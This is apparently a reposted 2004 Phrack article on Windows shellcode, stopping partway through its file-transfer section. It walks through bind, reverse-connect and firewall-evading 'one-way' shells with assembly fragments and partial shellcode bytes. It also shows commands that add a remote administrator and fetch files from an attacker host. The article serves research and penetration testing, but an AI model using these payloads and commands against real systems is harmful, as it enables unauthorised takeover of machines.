History and Advances in Windows Shellcode

    技术2022-05-13  2

                                                               ==Phrack Inc.==

                                     Volume 0xXX, Issue 0x3e, Phile #0x07 of 0x10

    |=-----------=[ History and Advances in Windows Shellcode ]=-------------=||=-----------------------------------------------------------------------=||=---------------=[ sk <sk at scan-associates d0t net> ]=----------------=||=------------------------=[ June 22nd, 2004 ]=--------------------------=|

    --[ Contents

      1. Abstract  2. Introduction to shellcode    a. Why shellcode?    b. Windows shellcode skeleton      i. Getting EIP      ii. Decoder      iii. Getting address of required function      iv. Locating Kernel32 base memory      v. Getting GetProcAddress()      vi. Getting other functions by name      vii. Spawning a shell    c. Compiling our shellcode  3. The connection    a. Bind to port shellcode      i. Bind to port shellcode implementation      ii. Problem with Bind to port shellcode    b. Reverse connect      i. Reverse connect shellcode implementation      ii. Problem with reverse connect shellcode  4. One-way shellcode    a. Find socket shellcode      i. Problem with find socket shellcode    b. Reuse address shellcode      i. Reuse address shellcode implementation      ii. Problem with reuse address shellcode    c. Rebind socket      i. Rebind socket shellcode implementation    d. Other one-way shellcode  5. Transferring file using shellcode    a. Uploading file with debug.exe    b. Uploading file with VBS    c. Retrieving file from command line  6. Avoiding IDS detection  7. Restarting vulnerable service  8. End of shellcode?  9. Greetz!  10. References  11. The code

    --[ 1. Abstract

    Firewall is everywhere in the Internet now. Most of the exploits released in the public have little concern over firewall rules because they are just proof of concept. In real world, we would encounter targets with firewall that will make exploitation harder. We need to overcome these obstacles for a successful penetration testing job. The research of this paper started when we need to take over (own) a machine which is heavily protected with rigid firewall rules. Although we can reach the vulnerable service but the strong firewall rules between us and the server hinder all standard exploits useless.

    The objective of the research is to find alternative ways which allow penetration tester to take control of a machine after a successful buffer overflow. A successful buffer overflow in a sense that it will eventually leads to arbitrary code execution. These alternative mechanisms should succeed where others fail even in the most rigid firewall rules.

    In our research to find a way to by pass these troublesome firewall rules, we looked into various existing techniques used by exploits in the public and why they fail. Then, we found several mechanisms that will work, but dependence to the vulnerable service. Although we can take over the server using these techniques, we take one step further to develop a more generic technique which is not dependence to any service and can be reuse in most other buffer overflows.

    This paper will start with dissection on a standard Win32 shellcode as an introduction. We will then explore the techniques being used by proof of concept codes to allow attacker to control the target and their limitations. Then, we will introduce a few alternatives techniques which we call "One-way shellcode" and how they may by pass firewall rules. Finally, we also discussed on a possible way to transfer file from command line without breaking the firewall rule.

    --[ 2. Introduction to shellcode

    An exploit usually consists of two major components:1.  Exploitation technique2.  Payload

    The objective of the exploitation part is to divert the execution path of the vulnerable program. We can achieve that via one of these techniques:

    *  Stack-based Buffer Overflow*  Heap-based Buffer Overflow*  Format String*  Integer Overflow*  Memory corruption, etc

    Even though we may use one or more of those exploitation techniques to control the execution path of a program, each vulnerability need to be exploited differently. Every vulnerability has different way to trigger the bug. We may use different buffer size or character set to trigger the overflow. Although we can probably use the same technique for vulnerabilities in the same class, we cannot use the same code.

    Once we control of the execution path, we probably want it to execute our code. Thus, we need to include these code or instruction set in our exploit. The part of code which allows us to execute arbitrary code is known as payload. The payload can virtually do everything a computer program can do with the permission of the vulnerable service.

    A payload that spawns you a shell is known as a shellcode. It allows interactive command execution. Unlike Exploitation technique, a well designed shellcode can easily be reused in other exploits. We will try to build shellcode that can be reused. A basic requirement of a shellcode is the shell and a connection that allow use to use it interactively.

    --[ 2.a Why shellcode?

    Why shellcode? Simply because it is the simplest way that allows the attacker to explore the target system interactively. It might give the attacker the ability to discover internal network, to further penetrate into other computers. A simple "net view /domain" command in Windows box would review many other easy targets.

    A shell may also allow upload/download file/database, which is usually needed as proof of successful pen-test. You also may easily install trojan horse, key logger, sniffer, Enterprise worm, WinVNC, etc. An Enterprise Worm could be a computer worm which was written specifically to infect other machine in the same domain using the credential of the primary domain controller.

    A shell is also useful to restart the vulnerable services. This will keep the service running and your client happy. But more importantly, restarting the vulnerable service usually allow us to attack the service again. We also may clean up traces like log files and events with a shell. There are just many other possibilities.

    However, spawning a shell is not the only thing you can do in your payload. As demonstrated by LSD in their Win32 ASM component, you can create a payload that loop and wait for command from the attacker. The attacker could issue a command to the payload to create new connection, upload/download file or spawn a shell. There are also a few others payload strategies in which the payload will loop and wait for additional payload from the attacker.

    Regardless whether a payload is spawning a shell or loop to wait for instructions, it still needs to communicate with the attacker. Although we are using payload that spawns a shell throughout this article, the mechanisms being use for communication can be use in other payload strategy.

    --[ 2.b Windows shellcode skeleton

    Shellcode usually start by getting to know where you are during the execution by grapping the EIP value. And then, a decoding process will take place. The process will then jump into the decoded memory area where execution can continue. Before we can do anything useful, we need to find addresses of all functions and API that we need to use in the shellcode. With that, we can setup a socket, and finally spawn a shell.

    *  Getting EIP*  Decoder*  Getting addresses of required functions*  Setup socket*  Spawning shell

    Let's look into what these components suppose to do, in greater detail.

    --[ 2.b.i Getting EIP

    We would like to make our shellcode as reusable as possible. For that, we will avoid using any fixed address which could change in different environment. We will use relative addressing as much as we could. To start with, we need to know where we are in the memory. This address will be our base address. Any variable or function in the shellcode will be relative to this address. To get this address, we can use a CALL and a POP instruction. As we already know, whenever we are calling a function, the return value is push into the stack just before the function is called. So, if the first thing we do in the function is a POP command, we will obtain the return value in a register. As shown below, EAX will be 451005.

    450000:        label1:  pop eax450005:     ... (eax = 451005)

    451000:     call label1    ;start here!451005:

    Most likely you will find something similar to the code below in a shellcode, which does about the same thing.

    450000:       jmp label1450002:      label2:   jmp cont450004:      label1:   call label2 450009:      cont:     pop eax        ...   (eax = 450009)

    Another interesting mechanism being use to obtain the EIP is to make use of a few special FPU instructions. This was implemented by Aaron Adams in Vuln-Dev mailing list in the discussion to create pure ASCII shellcode. The code uses fnstenv/fstenv instructions to save the state of the FPU environment.

      fldz  fnstenv [esp-12]  pop ecx  add cl, 10  nop

    ECX will hold the address of the EIP. However, these instructions will generate non-standard ASCII characters.

    --[ 2.b.ii Decoder

    Buffer overflow usually will not allow NULL and a few special characters. We can avoid using these characters by encoding our shellcode. The easiest encoding scheme is the XOR encoding. In this encoding, we will XOR each char in our shellcode with a predefined value. During execution, a decoder will translate the rest of the code back to real instruction by XOR it again with the predefined value. As shown here, we can set the number of byte we want to decode in ecx, and while eax is pointing to the starting point of our encoded shellcode. We xor the destination byte by byte with 0x96 until the loop over. There are other more advance encoding schemes, of cause. We can use a DWORD xor value instead of a char to encode 4 bytes at a time. We also may break the code apart by encoding them using a different xor key. All with the purpose to get rid of unusable chars in our shellcode.

      xor  ecx, ecx  mov   cl, 0C6h       ;size  loop1:    inc  eax  xor   byte ptr [eax], 96h  loop   loop1

    The Metasploit project (http://metasploit.com/) contains a few very useful encoders worth checking.

    --[ 2.b.iii Getting address of required function

    After the decoding process, we will jump into the memory area where the decoded shellcode start to continue our execution. Before we can do anything useful, we must locate the address of all APIs that we need to use and store it in a jump table. We are not going to use any fixed address to API because it is different between service packs. To get the address of API we need, we can use an API called GetProcAddress(). By supplying the name of the function we need to this API, it will return the address where we can call to use it. To obtain the address of GetProcAddress() itself, we can search the export table of the Kernel32.dll in the memory. Kernel32.dll image is located predefined in a memory location depending on the OS.

    *  NT - 0x77f00000*  2kSP2 & SP3 - 0x77e80000*  WinXP - 0x77e60000

    Since we know the default base memory of kernel32.dll is located at these locations, we can start looping backward from 0x77f00000 to look for "MZ/x90" byte sequences. Kernel32 start with "MZ/x90" mark just like any Windows application. This trick was used by High Speed Junky (HSJ) in his exploit and it works quite nicely for all the above OS and service pack. However Windows 2000 SP4's Kernel32.dll is located at 0x7c570000. In order to scan the memory from 0x77f00000, we need to setup an exception handler that will catch invalid memory access.

    --[ 2.b.iv Locating Kernel32 base memory

    However, there is a better method to get the kernel32 base memory. Using the fs selector, we can get into our PEB. By searching the PEB_LDR_DATA structure, we will find the list of DLL which our vulnerable program initialized when it start. The list of DLL will be loaded in sequence, first, NTDLL, followed by Kernel32. So, by traveling one nod forward in the list, we will get the base memory of the Kernel32.dll. This technique, complete with the code, has been published by researchers in VX-zine, then used by LSD in their Windows Assembly component.

      mov eax,fs:[30h]    ; PEB base  mov eax,[eax+0ch]    ; goto PEB_LDR_DATA  ; first entry in InInitializationOrderModuleList  mov esi,[eax+1ch]   lodsd          ; forward to next LIST_ENTRY  mov ebx,[eax+08h]    ; Kernel32 base memory

    --[ 2.b.v Getting GetProcAddress()

    Once we know the base address of Kernel32.dll, we can locate its Export Table and look for "GetProcAddress" string. We also can get the total of exported functions. Using the number, we loop until we find the string.

      mov  esi,dword ptr [ebx+3Ch]    ;to PE Header  add  esi,ebx   mov  esi,dword ptr [esi+78h]   ;to export table  add  esi,ebx   mov  edi,dword ptr [esi+20h]   ;to export name table  add  edi,ebx   mov  ecx,dword ptr [esi+14h]   ;number of exported function  push  esi   xor  eax,eax       ;our counter

    For each address in the jump table, we will check if the destination name is match with "GetProcAddress". If not, we increase EAX by one and continue searching. Once we found a match, EAX will be holding our counter. Using the following formula, we can obtain the real address of GetProcAddress().

    ProcAddr = (((counter * 2) + Ordinal) * 4) + AddrTable + Kernel32Base

    We count until we reach "GetProcAddress". Multiply the index by 2, add it to the address of exported ordinals table. It should now point to the ordinal of GetProcAddress(). Take the value, multiply it by 4. Total it up with the address of the addrress of the table and Kernel32 base address, we will get the real address of the GetProcAddress(). We can use the same technique to get the address of any exported function inside Kernel32.

    --[ 2.b.vi Getting other functions by name

    Once we get the address of GetProcAddress(), we can easily obtain address of any other API. Since there are quite a number of APIs that we need to use, we (actually, most of these codes were dissass from HSJ's exploit) build a function that take a function name and return the address. To use the function, set ESI pointing to the name of the API we want to load. It must be NULL terminated. Set EDI point to the jump table. A jump table is just a location where we store all addresses of API we need to call. Set ECX to number of API we want it to resolve.

    In this example, we call to load 3 APIs:

      mov  edi,esi     ;EDI is the output, our jump table  xor  ecx,ecx   mov  cl,3       ;Load 3 APIs  call  loadaddr

    The "loadaddr" function that get the job done:

    loadaddr:  mov  al,byte ptr [esi]   inc  esi   test  al,al  jne  loadaddr  ;loop till we found a NULL  push  ecx   push  edx   push  esi   push  ebx   call  edx     ;GetProcAddress(DLL, API_Name);  pop  edx   pop  ecx   stosd      ;write the output to EDI  loop  loadaddr  ;loop to get other APIs  ret

    --[ 2.b.vii Spawning a shell

    Once we have gone thru those troublesome API address loading, we can finally do something useful. To spawn a shell in Windows, we need to call the createProcess() API. To use this API, we need to set up the STARTUPINFO in such a way that, the input, output and error handler will be redirected to a socket. We also will set the structure so that the process will have no window. With the structure setup, we just need to call createProcess to launch "cmd.exe" to get an interactive command shell in windows.

    ;ecx is 0  mov  byte ptr [ebp],44h     ;STARTUPINFO size  mov  dword ptr [ebp+3Ch],ebx   ;output handler  mov  dword ptr [ebp+38h],ebx   ;input handler  mov  dword ptr [ebp+40h],ebx   ;error handler;STARTF_USESTDHANDLES |STARTF_USESHOWWINDOW  mov  word ptr [ebp+2Ch],0101h  lea  eax,[ebp+44h]   push  eax   push  ebp   push  ecx   push  ecx   push  ecx   inc  ecx   push  ecx   dec  ecx   push  ecx   push  ecx   push  esi   push  ecx   call  dword ptr [edi-28] ;createProcess

    --[ 2.c Compiling our shellcode

    The Code section in the end of the paper contains source code bind.asm. bind.asm is a complete shellcode written in Assembly Language which will create a shell in Windows and bind it to a specific port. Compile bind.asm:

    # tasm -l bind.asm

    It will produce 2 files:1.  bind.obj - the object code2.  bind.lst - assembly listing

    If we open bind.obj with a hex editor, we will see that the object code start with something similar to this:

    01)  80 0A 00 08 62 69 6E 64-2E 61 73 6D 62 88 20 00 ....bind.asmb. .02)  00 00 1C 54 75 72 62 6F-20 41 73 73 65 6D 62 6C ...Turbo Assembl03)  65 72 20 20 56 65 72 73-69 6F 6E 20 34 2E 31 99 er Version 4.1.04)  88 10 00 40 E9 49 03 81-2F 08 62 69 6E 64 2E 61 ...@.I../.bind.a05)  73 6D 2F 88 03 00 40 E9-4C 96 02 00 00 68 88 03 sm/...@.L....h..06)  00 40 A1 94 96 0C 00 05-5F 54 45 58 54 04 43 4F .@......_TEXT.CO07)  44 45 96 98 07 00 A9 B3-01 02 03 01 FE 96 0C 00 DE..............08)  05 5F 44 41 54 41 04 44-41 54 41 C2 98 07 00 A9 ._DATA.DATA.....09)  00 00 04 05 01 AE 96 06-00 04 46 4C 41 54 39 9A ..........FLAT9.10)  02 00 06 5E 96 08 00 06-44 47 52 4F 55 50 8B 9A ...^....DGROUP..11)  04 00 07 FF 02 5A 88 04-00 40 A2 01 91 A0 B7 01 .....Z...@......12)  01 00 00 EB 02 EB 05 E8-F9 FF FF FF 58 83 C0 1B ............X...13)  ...14)  5A 59 AB E2 EE C3 99 8A-07 00 C1 10 01 01 00 00 ZY..............15)  9C 6D 8E 06 D2 7C 26 F6-06 05 00 80 74 0E F7 06 .m...|&.....t...

    Our shellcode start with hex code of 0xEB, 0x02 as show in line 12 of the partial hex dump above. It will end with 0xC3 as shown in line 14. We need to use a hex editor to remove the first 176 bytes and the last 26 bytes. (You don't need to do this if you are using NASM compiler, but the author has been using TASM since his MS-DOS age).

    Now that we have the shellcode in its pure binary form, we just need to build a simple program that read from this file and produce the corresponding hex value in a C string. Refer to the Code section (xor.cpp) for the code that will do that. The output of the program is our shellcode in C string syntax:

    # xor bind.objBYTE shellcode[436] = """/xEB/x02/xEB/x05/xE8/xF9/xFF/xFF/xFF/x58/x83/xC0/x1B/x8D/xA0/x01"..."/xE2/xEE/xC3";

    --[ 3 The connection

    We have seen some of the basic building block of a shellcode. But we have not cover the connection part of the shellcode. As mentioned, a shellcode needs a shell and a connection to allow interactive command. We want to be able to send any command and see the output. Regardless if we are spawning a shell, transferring file or loop to wait for further command, we need to setup a connection. There are three published techniques: Bind to port, Reverse connect and Find socket shellcode. We will look into each one of these, as well as their limitation. Along the way, various exploits that uses these shellcode will be demonstrated to get a better understanding.

    --[ 3.a Bind to port shellcode

    Bind to port shellcode is popular being used in proof of concept exploit. The shellcode setup a socket, bind it to a specific port and listen for connection. Upon accepting a connection, you spawn a shell.

    This following APIs are needed for this type of connection:

    *  WSASocket()*  bind()*  listen()*  accept()

    It is important to note that we are using WSASocket() and not socket() to create a socket. Using WSASocket will create a socket that will not have an overlapped attribute. Such socket can be use directly as a input/output/error stream in createProcess() API. This eliminates the need to use anonymous pipe to get input/output from a process which exist in older shellcode. The size of the shellcode shrinks quite a bit using this technique. It was first introduced by David Litchfield. You can find many of Bind too port shellcode in Packetstorm Security by debugging shellcode of these exploits:

    *  slxploit.c*  aspcode.c*  aspx_brute.c

    --[ 3.a.1 Bind to port shellcode implementation

      mov  ebx,eax   mov  word ptr [ebp],2  mov  word ptr [ebp+2],5000h     ;port  mov  dword ptr [ebp+4], 0     ;IP  push  10h   push  ebp   push  ebx   call  dword ptr [edi-12]     ;bind  inc  eax  push  eax      push  ebx  call  dword ptr [edi-8]     ;listen (soc, 1)  push  eax  push  eax  push  ebx  call  dword ptr [edi-4]     ;accept

    Compiling bind.asm will create shellcode (435 bytes) that will work with any service pack. We will test the bind to port shellcode using a simple testing program - testskode.cpp. Copy the shellcode (in C string) generated the xor program and parse it into testskode.cpp:

    BYTE shellcode[436] = """/xEB/x02/xEB/x05/xE8/xF9/xFF/xFF/xFF/x58/x83/xC0/x1B/x8D/xA0/x01"...// this is the bind port of the shellcode  *(unsigned short *)&shellcode[0x134] = htons(1212) ^ 0x0000;

      void *ma = malloc(10000);  memcpy(ma,shellcode,sizeof(shellcode));

      __asm{    mov  eax,ma    int 3    jmp eax}  free(ma);

    Compile and running testskode.cpp will result in a break point just before we jump to the shellcode. If we let the process continue, it will bind to port 1212 and ready to accept connection. Using netcat, we can connect to port 1212 to get a shell.

    --[ 3.a.2 Problem with bind to port shellcode

    Using proof of concept exploit with bind to port shellcode against server in organization with firewall usually will not work. Even though we successfully exploited the vulnerability and our shellcode executed, we will have difficulties connecting to the bind port. Usually, firewall will allow connection to popular services like port 25, 53, 80, etc. But usually these ports are already in used by other applications. Sometimes the firewall rules just did not open these ports. We have to assume that the firewall block every port, expect for the port number of the vulnerable service.

    --[ 3.b Reverse connect shellcode

    To overcome the limitation of bind to port shellcode, many exploits prefer to use reverse connection shellcode. Instead of binding to a port waiting for connection, the shellcode simply connect to a predefined IP and port number to drop it a shell.

    We must include our IP and port number which the target must connect to give a shell in the shellcode. We also must run netcat or anything similar in advance, ready to accept connection. Of cause, we must be using IP address which the victim machine is reachable. Thus, usually we use public IP.

    The following APIs are needed to setup this type of connection:

    *  WSASocket()*  connect()

    You can find many of these examples in Packetstorm Security by debugging shellcode of these exploits:

    *  jill.c*  iis5asp_exp.c*  sqludp.c*  iis5htr_exp.c

    --[ 3.b.1 Reverse connect shellcode implementation

    push  eax push  eax push  eax push  eax inc  eax push  eax inc  eax push  eax call  dword ptr [edi-8]   ;WSASocketA mov  ebx,eax mov  word ptr [ebp],2mov  word ptr [ebp+2],5000h  ;port in network byte ordermov  dword ptr [ebp+4], 2901a8c0h ;IP in network byte orderpush  10h push  ebp push  ebx call  dword ptr [edi-4] ;connect

    Compiling reverse.asm will create shellcode (384 bytes) that will work with any service pack. We will use this shellcode in our JRun/ColdFusion exploit. However there is still one problem. This exploit will not accept NULL character. We need to encode our shellcode with an XOR shield. We can use the xor.cpp to encode our shellcode using its third parameter.

    First, let's compile reverse.asm:

    # /tasm/bin/tasm -l reverse.asm

    Then, hex-edit reverse.obj to get our shellcode. Refer to bind to port shellcode on how to do it. Now, use xor.cpp to print the shellcode:

    # xor reverse.objBYTE shellcode[384] = """/xEB/x02/xEB/x05/xE8/xF9/xFF/xFF/xFF/x58/x83/xC0/x1B/x8D/xA0/x01""/xFC/xFF/xFF/x83/xE4/xFC/x8B/xEC/x33/xC9/x66/xB9/x5B/x01/x80/x30""/x96/x40/xE2/xFA/xE8/x60/x00/x00/x00/x47/x65/x74/x50/x72/x6F/x63"...

    The first 36 bytes of the shellcode is our decoder. It has been carefully crafted to avoid NULL. We keep this part of the shellcode. Then, we run xor.cpp again with an extra parameter to xor the code with 0x96.

    # xor reverse.obj 96BYTE shellcode[384] = """/x7D/x94/x7D/x93/x7E/x6F/x69/x69/x69/xCE/x15/x56/x8D/x1B/x36/x97""/x6A/x69/x69/x15/x72/x6A/x1D/x7A/xA5/x5F/xF0/x2F/xCD/x97/x16/xA6""/x00/xD6/x74/x6C/x7E/xF6/x96/x96/x96/xD1/xF3/xE2/xC6/xE4/xF9/xF5"..."/x56/xE3/x6F/xC7/xC4/xC0/xC5/x69/x44/xCC/xCF/x3D/x74/x78/x55";

    We take bytes sequence from the 37th bytes onwards. Combine the encoder and the xored shellcode, we will get the actual shellcode that we can use in our exploit.

    BYTE shellcode[384] = """/xEB/x02/xEB/x05/xE8/xF9/xFF/xFF/xFF/x58/x83/xC0/x1B/x8D/xA0/x01""/xFC/xFF/xFF/x83/xE4/xFC/x8B/xEC/x33/xC9/x66/xB9/x5B/x01/x80/x30""/x96/x40/xE2/xFA""/x7E/xF6/x96/x96/x96/xD1/xF3/xE2/xC6/xE4/xF9/xF5"..."/x56/xE3/x6F/xC7/xC4/xC0/xC5/x69/x44/xCC/xCF/x3D/x74/x78/x55";

    We can use the following statements in our exploit to change the IP and port to our machine which has netcat listening for a shell.

    *(unsigned int *)&reverse[0x12f] = resolve(argv[1]) ^ 0x96969696;*(unsigned short *)&reverse[0x12a] = htons(atoi(argv[2])) ^ 0x9696;

    The JRun/ColdFusion exploit is attached in the Code section (weiwei.pl). The exploit uses Reverse connect shellcode.

    --[ 3.b.2 Problem with reverse connect shellcode

    It is not unusual to find server which has been configure to block out going connection. Firewall usually blocks all outgoing connection from DMZ.

    --[ 4 One-Way shellcode

    With the assumption that firewall has been configured with the following rules:

    *  Blocks all ports except for listening ports of the services*  Blocks all outgoing connections from server

    Is there any way to control the server remotely? In some case, it is possible to use existing resources in the vulnerable service to establish the control. For example, it may be possible to hook certain functions in the vulnerable service so that it will take over socket connection or anything similar. The new function may check any network packet for a specific signature. If there is, it may execute command that attached along with the network packet. Otherwise, the packet passes to the original function. We can then connect to the vulnerable service with our signature to trigger a command execution. As early as in 2001, Code Red worm uses some sort of function hooking to deface web site (http://www.eeye.com/html/Research/Advisories/AL20010717.html).

    Another alternative will be to use resources that available from the vulnerable service. It is also possible to patch the vulnerable service to cripple the authentication procedure. This will be useful for services like database, telnet, ftp, SSH and alike. In the case of Web server, it is possible to create PHP/ASP/CGI pages in the web root that will allow remote command execution via web pages. The shellcode in the following link create an ASP page, as implemented by Mikey (Michael Hendrickx):


    Code Red 2 worm also has a very interesting method to create a backdoor of an IIS server. It creates a virtual path to drive C: and D: of the server to the web root. Using these virtual paths, attacker can execute cmd.exe which will then allow remote command execution:


    However, these implementations are specific to the service we are exploiting. We hope to find a generic mechanism to bypass the firewall rules so that we can easily reuse our shellcode. With the assumption that the only way to interact with the server is through the port of the vulnerable service, we call these shellcode, One-way shellcode:

    *  Find socket*  Reuse address socket*  Rebind socket

    --[ 4.a Find socket shellcode

    This method was documented in LSD's paper on Unix shellcode (http://lsd-pl.net/unix_assembly.html). Although the code is for Unix, we can use the same technique in the Windows world. The idea is to locate the existing connection that the attacker was using during the attack and use that connection for communication.

    Most WinSock API requires only the socket descriptor for its operation. So, we need to find this descriptor. In our implementation, we loop from 0x80 onwards. This number is chosen because socket descriptors below 0x80 are usually not relevant to our network connection. In our experience, using socket descriptor below 0x80 in WinSock API sometimes crash our shellcode due to lack of Stack space.

    We will get the destination port of the network connection for each socket descriptor. It is compared with a known value. We hard coded this value in our shellcode. If there is a match, we found our connection. However, socket may not be a non-overlapping socket. Depending on the program that created the socket, there is possibility that the socket we found is an overlapping socket. If this is the case, we cannot use it directly as in/out/err handler in createProcess(). To get an interaction communication from this type of socket, we can anonymous pipe. Description on using anonymous pipe in shellcode can be found in article by Dark Spyrit (http://www.phrack.org/show.php?p=55&a=15) and LSD (http://lsd-pl.net/windows_components.html).

    xor  ebx,ebx  mov  bl,80hfind:  inc  ebx  mov  dword ptr [ebp],10h  lea  eax,[ebp]  push  eax  lea  eax,[ebp+4]  push  eax  push  ebx         ;socket  call  dword ptr [edi-4]    ;getpeername  cmp  word ptr [ebp+6],1234h    ;myport  jne  findfound:  push  ebx        ;socket

    Find socket shellcode work by comparing the destination port of the socket with a known port number. Thus, attacker must obtain this port number first before sending the shellcode. It can be easily done by calling getsockname() on a connected socket.

    It is important to note that this type of shellcode should be use in an environment where the attacker is not in a private IP. If you are in a private IP, your Firewall NATing will create a new connection to the victim machine during your attack. That connection will have a different source port that what you obtain in your machine. Thus, your shellcode will never be able to find the actually connection.

    Find socket implementation can be found in findsock.asm in the Code section. There is also a sample usage of find socket shellcode in hellobug.pl, an exploit for MS SQL discovered Dave Aitel.

    --[ 4.a.1 Problem with Find socket shellcode

    Find socket could be perfect, but in some case, socket descriptor of the attacking connection is no longer available. It is possible that the socket might already been closed before it reach the vulnerable code. In some case, the buffer overflow might be in another process altogether.

    --[ 4.b Reuse address shellcode

    Since we fail to find the socket descriptor of our connection in a vulnerability that we are exploiting, we need to find another way. In the worst scenario, the firewall allows incoming connection only to one port; the port which the vulnerable service is using. So, if we can somehow create a bind to port shellcode that actually bind to the port number of the vulnerable service, we can get a shell by connecting to the same port.

    Normally, we will not be able to bind to a port which already been used. However, if we set our socket option to SO_REUSEADDR, it is possible bind our shellcode to the same port of the vulnerable service. Moreover, most applications simply bind a port to INADDR_ANY interface, including IIS. If we know the IP address of the server, we can even specify the IP address during bind() so that we can bind our shellcode in front of vulnerable service. Binding it to a specific IP allow us to get the connection first.

    Once this is done, we just need to connect to the port number of the vulnerable service to get a shell. It is also interesting to note that Win32 allow any user to connect to port below 1024. Thus, we can use this method even if we get IUSR or IWAM account.

    If we don't know the IP address of the server (may be it is using port forwarding to an internal IP), we still can bind the process to INADDR_ANY. However, this means we will have 2 processes excepting connection from the same port on the same interface. In our experience, we may need to connect a few times to get a shell. This is because the other process could occasionally get the connection.

    API needed to create a reuse address shellcode:

    *  WSASocketA()*  setsockopt()*  bind()*  listen()*  accept()

    --[ 4.b.1 Reuse address shellcode implementation

    mov  word ptr [ebp],2push  4push  ebppush  4        ;SO_REUSEADDRpush  0ffffhpush  ebxcall  dword ptr [edi-20]   ;setsockopt mov  word ptr [ebp+2],5000h   ;portmov  dword ptr [ebp+4], 0h   ;IP, can be 0push  10h push  ebp push  ebx call  dword ptr [edi-12]   ;bind

    Reuse address shellcode implementation is in reuse.asm (434 bytes) in the Code section. Same usage of this type of shellcode is implemented in reusewb.c exploit. This exploit is using the NTDLL (WebDav) vulnerability on IIS Web server.

    --[ 4.b.2 Problem with reuse address shellcode

    Some applications use SO_EXCLUSIVEADDRUSE, thus reusing the address is not possible.

    --[ 4.c Rebind socket shellcode

    It is not unusual to find application that actually uses SO_ EXCLUSIVEADDRUSE option to prevent us to reuse its address. So, our research did not stop there. We feel that there is a need to create a better shellcode. Assuming that we have same restriction we have as before. The only way to connect to the vulnerable machine is via the port of the vulnerable service. Instead of sharing the port gracefully as reuse address socket shellcode, we can take over the port number entirely.

    If we can terminate the vulnerable service, we can bind our shell into the very same port that was previously used by the vulnerable service. If we can achieve that, the next connection to this port will yield a shell.

    However, our shellcode is usually running as part of the vulnerable service. Terminating the vulnerable service will terminate our shellcode.

    To get around with this, we need to fork our shellcode into a new process. The new process will bind to a specific port as soon as it is available. The vulnerable service will be forcefully terminated.

    Forking is not as simple as in Unix world. Fortunately, LSD has done all the hard work for us (http://lsd-pl.net/windows_components.html). It is done in the following manner as implemented by LSD:

    1.  Call createProcess() API to create a new process. We must   supply a filename to this API. It doesn't matter which file, as   long as it exist in the system. However, if we choose name like   IExplore, we might be able to bypass even personal firewall. We   also must create the process in Suspend Mode.2.  Call GetThreadContext() to retrieve the environment of the   suspended process. This call allows us to retrieve various   information, including CPU registry of the suspended process.3.  Use VirtualAllocEx() to create enough buffer for our shellcode   in the suspended process.4.  Call WriteProcessMemory() to copy our shellcode from the   vulnerable service to the new buffer in the suspended process.5.  Use SetThreadContext() to replace EIP with memory address of   the new buffer.6.  ResumeThread() will resume the suspended thread. When the   thread starts, it will point directly to the new buffer which   contains our shellcode.

    The new shellcode in the separate process will loop constantly trying to bind to port of the vulnerable service. However, until we successfully terminate the vulnerable machine it will not be able to continue.

    Back in our original shellcode, we will execute TerminateProcess() to forcefully terminate the vulnerable service. TerminateProcess() take two parameters, the Process handle to be terminated and the return value. Since we are terminating the current process, we can just pass -1 as the Process Handle.

    As soon as the vulnerable service terminated, our shellcode in a separate process will be able to bind successfully to the specific port number. It will continue to bind a shell to that port and waiting for connection. To connect to this shell, we just need to connect to the target machine on the port number of the vulnerable service.

    It is possible to improve the shellcode further by checking source port number of IP before allowing a shell. Otherwise, anyone connecting to that port immediately after your attack will obtain the shell.

    --[ 4.c.1 Rebind socket shellcode implementation

    Rebind socket shellcode is implemented in rebind.asm in the Code section. We need to use a lot of APIs in this shellcode. Loading these APIs by name will make our shellcode much bigger than it should be. Thus, the rebind socket shellcode is using another method to locate the APIs that we need. Instead of comparing the API by its name, we can compare by its fingerprint/hash. We generate a fingerprint for each API name we want to use and store it in our shellcode. Thus, we only need to store 4 bytes (size of the fingerprint) for each API. During shellcode execution, we will calculate the fingerprint of API name in the Export Table and compare it with our value. If there is a match, we found the API we need. The function that loads an API address by its fingerprint in rebind.asm was ripped from HD Moore's MetaSploit Framework (http://metasploit.com/sc/win32_univ_loader_src.c).

    A sample usage of a rebind socket shellcode can be found rebindwb.c and lengmui.c in the Code section. Rebindwb.c is an exploit modified from the previous WebDAV exploit that make use of Rebind shellcode. It will attack IIS, kill it and take over its port. Connecting to port 80 after the exploit will grant the attacker a shell.

    The other exploit, lengmui.c is MSSQL Resolution bug, it attack UDP 1434, kill MSSQL server, bind itself to TCP 1433. Connection to TCP 1433 will grant the attacker a shell.

    --[ 4.d Other one-way shellcode

    There are other creative mechanisms being implemented by Security Expert in the field. For example, Brett Moore's 91 bytes shellcode as published in Pen-Test mailing list (http://seclists.org/lists/pen-test/2003/Jan/0000.html). It is similar to the Find Socket shellcode, only that, instead of actually finding the attacking connection, the shellcode create a new process of CMD for every socket descriptor.

    Also similar to Find socket shellcode, instead of checking the destination port to identify our connection, XFocus's forum has discussion on sending additional bytes for verification. Our shellcode will read 4 more bytes from every socket descriptor, and if the bytes match with our signature, we will bind a CMD shell to that connection. It could be implemented as:

    *  An exploit send additional bytes as signature ("ey4s") after   sending the overflow string*  The shellcode will set each socket descriptor to non-blocking*  Shellcode call API recv() to check for "ey4s"*  If there is a match, spawn CMD*  Loop if not true

    It is also possible to send it with "MSG_OOB" flag. As implemented by san _at_ xfocus d0t org.

    Yet, another possibility is to implement shellcode that execute command that attached in the shellcode it self. There is no need to create network connection. The shellcode just execute the command and die. We can append our command as part of the shellcode and execute createProcess() API. A sample implementation can be found on dcomx.c in the Code section. For example, we can use the following command to add a remote administrator to a machine which is vulnerable to RPC-DCOM bug as discovered by LSD.

    # dcomx "cmd /c net user /add compaquser compaqpass"# dcomx "cmd /c net localgroup /add administrators compaquser"

    --[ 5 Transferring file using shellcode

    One of the most common things to do after you break into a box is to upload or download files. We usually download files from our target as proof of successful penetration testing. We also often upload additional tools to the server to use it as an attacking point to attack other internal server.

    In the absent of a firewall, we can easily use FTP or TFTP tools found in standard Windows installation to get the job done:

    *  ftp -s:script*  tftp -i myserver GET file.exe

    However, in a situation where there is no other way to go in and out, we can still transfer file using the shell we obtain from our One-way shellcode. It is possible to reconstruct a binary file by using the debug.exe command available in almost every Windows.

    --[ 5.a Uploading file with debug.exe

    We can create text file in our target system using the echo command. But we can't use echo to create binary file, not with the help from debug.exe. It is possible to reconstructing binary using debug.exe. Consider the following commands:

